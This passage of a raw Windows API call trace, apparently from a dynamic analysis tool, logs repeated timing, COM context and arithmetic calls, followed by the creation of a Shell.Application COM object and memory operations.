0x1 [0102.653] GetTickCount () returned 0x210da4a [0102.655] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.655] MulDiv (nNumber=951, nNumerator=100, nDenominator=3619) returned 26 [0102.655] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.655] GetTickCount () returned 0x210da4a [0102.661] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fba90 | out: ppv=0xd6788fba90*=0x24adf97e528) returned 0x0 [0102.662] MulDiv (nNumber=930, nNumerator=100, nDenominator=3693) returned 25 [0102.662] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.662] GetTickCount () returned 0x210da5a [0102.666] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fba90 | out: ppv=0xd6788fba90*=0x24adf97e528) returned 0x0 [0102.666] MulDiv (nNumber=946, nNumerator=100, nDenominator=3787) returned 25 [0102.666] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.666] GetTickCount () returned 0x210da5a [0102.670] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.672] MulDiv (nNumber=914, nNumerator=100, nDenominator=3866) returned 24 [0102.673] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.673] GetTickCount () returned 0x210da5a [0102.680] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.680] MulDiv (nNumber=956, nNumerator=100, nDenominator=3978) returned 24 [0102.680] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.680] GetTickCount () returned 0x210da69 [0102.684] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.684] MulDiv (nNumber=955, nNumerator=100, nDenominator=4047) returned 24 [0102.684] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.685] GetTickCount () returned 0x210da69 [0102.685] GetTickCount () returned 0x210da69 [0102.688] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.688] MulDiv (nNumber=934, nNumerator=100, nDenominator=4116) returned 23 [0102.688] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.688] GetTickCount () returned 0x210da69 [0102.693] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fba90 | out: ppv=0xd6788fba90*=0x24adf97e528) returned 0x0 [0102.693] MulDiv (nNumber=953, nNumerator=100, nDenominator=4207) returned 23 [0102.694] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.694] GetTickCount () returned 0x210da79 [0102.696] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.696] MulDiv (nNumber=947, nNumerator=100, nDenominator=4278) returned 22 [0102.697] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.697] GetTickCount () returned 0x210da79 [0102.700] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.700] MulDiv (nNumber=948, nNumerator=100, nDenominator=4355) returned 22 [0102.700] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.700] GetTickCount () returned 0x210da79 [0102.700] GetTickCount () returned 0x210da79 [0102.704] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.704] MulDiv (nNumber=957, nNumerator=100, nDenominator=4437) returned 22 [0102.704] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.704] GetTickCount () returned 0x210da79 [0102.716] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.717] MulDiv (nNumber=933, nNumerator=100, nDenominator=4505) returned 21 [0102.717] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.717] GetTickCount () returned 0x210da89 [0102.721] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fba90 | out: ppv=0xd6788fba90*=0x24adf97e528) returned 0x0 [0102.721] MulDiv (nNumber=953, nNumerator=100, nDenominator=4596) returned 21 [0102.721] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.721] GetTickCount () returned 0x210da98 [0102.726] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.727] MulDiv (nNumber=940, nNumerator=100, nDenominator=4670) returned 20 [0102.727] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.727] GetTickCount () returned 0x210da98 [0102.729] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fba90 | out: ppv=0xd6788fba90*=0x24adf97e528) returned 0x0 [0102.729] MulDiv (nNumber=961, nNumerator=100, nDenominator=4758) returned 20 [0102.729] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.729] GetTickCount () returned 0x210da98 [0102.734] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.734] MulDiv (nNumber=936, nNumerator=100, nDenominator=4824) returned 19 [0102.735] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.735] GetTickCount () returned 0x210da98 [0102.739] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.739] MulDiv (nNumber=950, nNumerator=100, nDenominator=4913) returned 19 [0102.740] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.740] GetTickCount () returned 0x210daa8 [0102.743] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0102.744] MulDiv (nNumber=927, nNumerator=100, nDenominator=4989) returned 19 [0102.744] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.744] GetTickCount () returned 0x210daa8 [0102.747] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fd520 | out: ppv=0xd6788fd520*=0x24adf97e528) returned 0x0 [0102.747] MulDiv (nNumber=950, nNumerator=100, nDenominator=5089) returned 19 [0102.747] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.747] GetTickCount () returned 0x210daa8 [0102.749] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788f9320 | out: ppv=0xd6788f9320*=0x24adf97e528) returned 0x0 [0102.750] MulDiv (nNumber=939, nNumerator=100, nDenominator=5163) returned 18 [0102.750] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.750] GetTickCount () returned 0x210daa8 [0102.752] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788f9320 | out: ppv=0xd6788f9320*=0x24adf97e528) returned 0x0 [0102.752] MulDiv (nNumber=955, nNumerator=100, nDenominator=5248) returned 18 [0102.752] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.752] GetTickCount () returned 0x210daa8 [0102.756] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fba90 | out: ppv=0xd6788fba90*=0x24adf97e528) returned 0x0 [0102.756] MulDiv (nNumber=1001, nNumerator=100, nDenominator=5317) returned 19 [0102.756] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.756] GetTickCount () returned 0x210dab8 [0102.759] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fd520 | out: ppv=0xd6788fd520*=0x24adf97e528) returned 0x0 [0102.759] MulDiv (nNumber=952, nNumerator=100, nDenominator=5344) returned 18 [0102.759] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.759] GetTickCount () returned 0x210dab8 [0102.762] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788f9320 | out: ppv=0xd6788f9320*=0x24adf97e528) returned 0x0 [0102.762] MulDiv (nNumber=947, nNumerator=100, nDenominator=5416) returned 17 [0102.762] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.762] GetTickCount () returned 0x210dab8 [0102.765] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788f9f30 | out: ppv=0xd6788f9f30*=0x24adf97e528) returned 0x0 [0102.765] MulDiv (nNumber=995, nNumerator=100, nDenominator=5494) returned 18 [0102.765] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.765] GetTickCount () returned 0x210dab8 [0102.768] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788f9320 | out: ppv=0xd6788f9320*=0x24adf97e528) returned 0x0 [0102.769] MulDiv (nNumber=950, nNumerator=100, nDenominator=5523) returned 17 [0102.770] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.770] GetTickCount () returned 0x210dac7 [0102.772] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fba90 | out: ppv=0xd6788fba90*=0x24adf97e528) returned 0x0 [0102.773] MulDiv (nNumber=983, nNumerator=100, nDenominator=5601) returned 18 [0102.773] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.773] GetTickCount () returned 0x210dac7 [0102.776] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fba90 | out: ppv=0xd6788fba90*=0x24adf97e528) returned 0x0 [0102.776] MulDiv (nNumber=981, nNumerator=100, nDenominator=5642) returned 17 [0102.776] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.776] GetTickCount () returned 0x210dac7 [0102.777] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788f9320 | out: ppv=0xd6788f9320*=0x24adf97e528) returned 0x0 [0102.778] MulDiv (nNumber=966, nNumerator=100, nDenominator=5686) returned 17 [0102.778] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.778] GetTickCount () returned 0x210dac7 [0102.781] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788f9f30 | out: ppv=0xd6788f9f30*=0x24adf97e528) returned 0x0 [0102.782] MulDiv (nNumber=953, nNumerator=100, nDenominator=5744) returned 17 [0102.782] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.782] GetTickCount () returned 0x210dac7 [0102.786] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788f9f30 | out: ppv=0xd6788f9f30*=0x24adf97e528) returned 0x0 [0102.786] MulDiv (nNumber=960, nNumerator=100, nDenominator=5815) returned 17 [0102.786] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.786] GetTickCount () returned 0x210dad7 [0102.789] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788f8fe0 | out: ppv=0xd6788f8fe0*=0x24adf97e528) returned 0x0 [0102.790] MulDiv (nNumber=949, nNumerator=100, nDenominator=5885) returned 16 [0102.790] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.790] GetTickCount () returned 0x210dad7 [0102.792] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788f83d0 | out: ppv=0xd6788f83d0*=0x24adf97e528) returned 0x0 [0102.792] MulDiv (nNumber=961, nNumerator=100, nDenominator=5960) returned 16 [0102.792] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.792] GetTickCount () returned 0x210dad7 [0102.795] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fc290 | out: ppv=0xd6788fc290*=0x24adf97e528) returned 0x0 [0102.795] MulDiv (nNumber=993, nNumerator=100, nDenominator=6024) returned 16 [0102.795] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.795] GetTickCount () returned 0x210dad7 [0102.797] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788f83d0 | out: ppv=0xd6788f83d0*=0x24adf97e528) returned 0x0 [0102.798] MulDiv (nNumber=940, nNumerator=100, nDenominator=6062) returned 16 [0102.798] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.798] GetTickCount () returned 0x210dad7 [0102.804] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788f83d0 | out: ppv=0xd6788f83d0*=0x24adf97e528) returned 0x0 [0102.804] MulDiv (nNumber=973, nNumerator=100, nDenominator=6146) returned 16 [0102.804] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.804] GetTickCount () returned 0x210dae6 [0102.807] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788f9320 | out: ppv=0xd6788f9320*=0x24adf97e528) returned 0x0 [0102.808] MulDiv (nNumber=974, nNumerator=100, nDenominator=6197) returned 16 [0102.808] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.808] GetTickCount () returned 0x210dae6 [0102.810] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788f8fe0 | out: ppv=0xd6788f8fe0*=0x24adf97e528) returned 0x0 [0102.810] MulDiv (nNumber=970, nNumerator=100, nDenominator=6254) returned 16 [0102.810] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.810] GetTickCount () returned 0x210dae6 [0102.812] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fb680 | out: ppv=0xd6788fb680*=0x24adf97e528) returned 0x0 [0102.812] MulDiv (nNumber=965, nNumerator=100, nDenominator=6308) returned 15 [0102.812] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.812] GetTickCount () returned 0x210dae6 [0102.834] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa730 | out: ppv=0xd6788fa730*=0x24adf97e528) returned 0x0 [0102.835] free (_Block=0x24ae1483eb0) [0102.835] MulDiv (nNumber=1898, nNumerator=100, nDenominator=7394) returned 26 [0102.835] IUnknown:Release (This=0x24adf97e528) returned 0x1 [0102.835] GetTickCount () returned 0x210db06 [0102.835] GetTickCount () returned 0x210db06 [0102.837] IUnknown:AddRef (This=0x24adf98ae30) returned 0x2 [0102.837] ITypeInfo:LocalGetIDsOfNames (This=0x24adf98ae30) returned 0x0 [0102.837] IUnknown:Release (This=0x24adf98ae30) returned 0x1 [0102.837] IUnknown:AddRef (This=0x24adf98ae30) returned 0x2 [0102.837] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0102.838] CLSIDFromProgID (in: lpszProgID="shell.application", lpclsid=0xd6788fa930 | out: lpclsid=0xd6788fa930*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0 [0102.839] CoCreateInstance (in: rclsid=0xd6788fa930*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x7ff7889e6f30*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fa928 | out: ppv=0xd6788fa928*=0x24adf9b3040) returned 0x0 [0102.840] Shell:IUnknown:QueryInterface (in: This=0x24adf9b3040, riid=0x7ff7889e6f40*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd6788fa920 | out: ppvObject=0xd6788fa920*=0x24adf9b3040) returned 0x0 [0102.841] Shell:IUnknown:Release (This=0x24adf9b3040) returned 0x1 [0102.841] IUnknown:Release (This=0x24adf98ae30) returned 0x1 [0102.841] Shell:IUnknown:QueryInterface (in: This=0x24adf9b3040, riid=0x7ff859890440*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0xd6788fae70 | out: ppvObject=0xd6788fae70*=0x0) returned 0x80004002 [0102.841] Shell:IUnknown:QueryInterface (in: This=0x24adf9b3040, riid=0x7ff859893858*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0xd6788fae80 | out: ppvObject=0xd6788fae80*=0x0) returned 0x80004002 [0102.841] Shell:IUnknown:QueryInterface (in: This=0x24adf9b3040, riid=0x7ff859890430*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0xd6788fae88 | out: ppvObject=0xd6788fae88*=0x0) returned 0x80004002 [0102.841] Shell:IUnknown:QueryInterface (in: This=0x24adf9b3040, riid=0x7ff859890460*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0xd6788fae10 | out: ppvObject=0xd6788fae10*=0x0) returned 0x80004002 [0102.841] Shell:IUnknown:QueryInterface (in: This=0x24adf9b3040, riid=0x7ff859893328*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd6788fae18 | out: ppvObject=0xd6788fae18*=0x24adf9b3040) returned 0x0 [0102.841] GetTickCount () returned 0x210db06 [0102.841] Shell:IUnknown:Release (This=0x24adf9b3040) returned 0x1 [0102.841] malloc (_Size=0x70) returned 0x24ae141cbe0 [0102.841] GetTickCount () returned 0x210db06 [0102.841] GetTickCount () returned 0x210db06 [0102.842] GetTickCount () returned 0x210db06 [0102.842] GetTickCount () returned 0x210db06 [0102.842] GetTickCount () returned 0x210db06 [0102.842] GetTickCount () returned 0x210db06 [0102.842] GetTickCount () returned 0x210db06 [0102.842] GetTickCount () returned 0x210db06 [0102.842] GetTickCount () returned 0x210db06 [0102.842] GetTickCount () returned 0x210db06 [0102.842] GetTickCount () returned 0x210db06 [0102.842] GetTickCount () returned 0x210db06 [0102.842] memcpy (in: _Dst=0x24ae1a7d0f8, _Src=0x24ae145c480, _Size=0x18 | out: _Dst=0x24ae1a7d0f8) returned 0x24ae1a7d0f8 [0102.842] GetTickCount () returned 0x210db06 [0102.842] GetTickCount () returned 0x210db06 [0102.843] GetTickCount () returned 0x210db06 [0102.843] GetTickCount () returned 0x210db06 [0102.843] memcpy (in: _Dst=0x24adf9dec28, _Src=0xd6788fabe0, _Size=0x6 | out: _Dst=0x24adf9dec28) returned 0x24adf9dec28 [0102.843] malloc (_Size=0x28) returned 0x24ae140f9a0 [0102.844] GetTickCount () returned 0x210db06 [0102.844] memcpy (in: _Dst=0x24adf9d3b8e, _Src=0x24ae1a102d8, _Size=0x10 | out: _Dst=0x24adf9d3b8e) returned 0x24adf9d3b8e [0102.844] memcpy (in: _Dst=0x24adf9d3b88, _Src=0x24adf9dec28, _Size=0x6 | out: _Dst=0x24adf9d3b88) returned 0x24adf9d3b88 [0102.845] free (_Block=0x24ae140f9a0) [0102.846] malloc (_Size=0x70) returned 0x24ae141c960 [0102.847] GetTickCount () returned 0x210db15 [0102.847] GetTickCount () returned 0x210db15 [0102.847] GetTickCount () returned 0x210db15 [0102.847] GetTickCount () returned 0x210db15 [0102.847] GetTickCount () returned 0x210db15 [0102.848] GetTickCount () returned 0x210db15 [0102.849] GetTickCount () returned 0x210db15 [0102.850] GetTickCount () returned 0x210db15 [0102.850] GetTickCount () returned 0x210db15 [0102.851] GetTickCount () returned 0x210db15 [0102.851] malloc (_Size=0x28) returned 0x24ae140fd30 [0102.852] GetTickCount () returned 0x210db15 [0102.852] GetTickCount () returned 0x210db15 [0102.853] GetTickCount () returned 0x210db15 [0102.853] malloc (_Size=0x28) returned 0x24ae140fd60 [0102.853] GetTickCount () returned 0x210db15 [0102.853] GetTickCount () returned 0x210db15 [0102.854] GetTickCount () returned 0x210db15 [0102.854] GetTickCount () returned 0x210db15 [0102.854] GetTickCount () returned 0x210db15 [0102.855] malloc (_Size=0x28) returned 0x24ae140fd90 [0102.855] GetTickCount () returned 0x210db15 [0102.855] GetTickCount () returned 0x210db15 [0102.855] GetTickCount () returned 0x210db15 [0102.856] malloc (_Size=0x28) returned 0x24ae1410180 [0102.856] GetTickCount () returned 0x210db15 [0102.856] memcpy (in: _Dst=0x24adf9d3680, _Src=0x24adf9debc8, _Size=0x2 | out: _Dst=0x24adf9d3680) returned 0x24adf9d3680 [0102.856] memcpy (in: _Dst=0x24adf9d367e, _Src=0x24adf9ded08, _Size=0x2 | out: _Dst=0x24adf9d367e) returned 0x24adf9d367e [0102.856] memcpy (in: _Dst=0x24adf9d367c, _Src=0x24adf9dec68, _Size=0x2 | out: _Dst=0x24adf9d367c) returned 0x24adf9d367c [0102.856] memcpy (in: _Dst=0x24adf9d367a, _Src=0x24adf9deea8, _Size=0x2 | out: _Dst=0x24adf9d367a) returned 0x24adf9d367a [0102.856] memcpy (in: _Dst=0x24adf9d3678, _Src=0x24adf9dec08, _Size=0x2 | out: _Dst=0x24adf9d3678) returned 0x24adf9d3678 [0102.857] free (_Block=0x24ae1410180) [0102.857] GetTickCount () returned 0x210db15 [0102.857] GetTickCount () returned 0x210db15 [0102.858] GetTickCount () returned 0x210db15 [0102.858] GetTickCount () returned 0x210db15 [0102.858] memcpy (in: _Dst=0x24adf9dece8, _Src=0xd6788f8b00, _Size=0x4 | out: _Dst=0x24adf9dece8) returned 0x24adf9dece8 [0102.858] malloc (_Size=0x28) returned 0x24ae140ff40 [0102.858] GetTickCount () returned 0x210db15 [0102.858] memcpy (in: _Dst=0x24adf9d385c, _Src=0x24adf9dece8, _Size=0x4 | out: 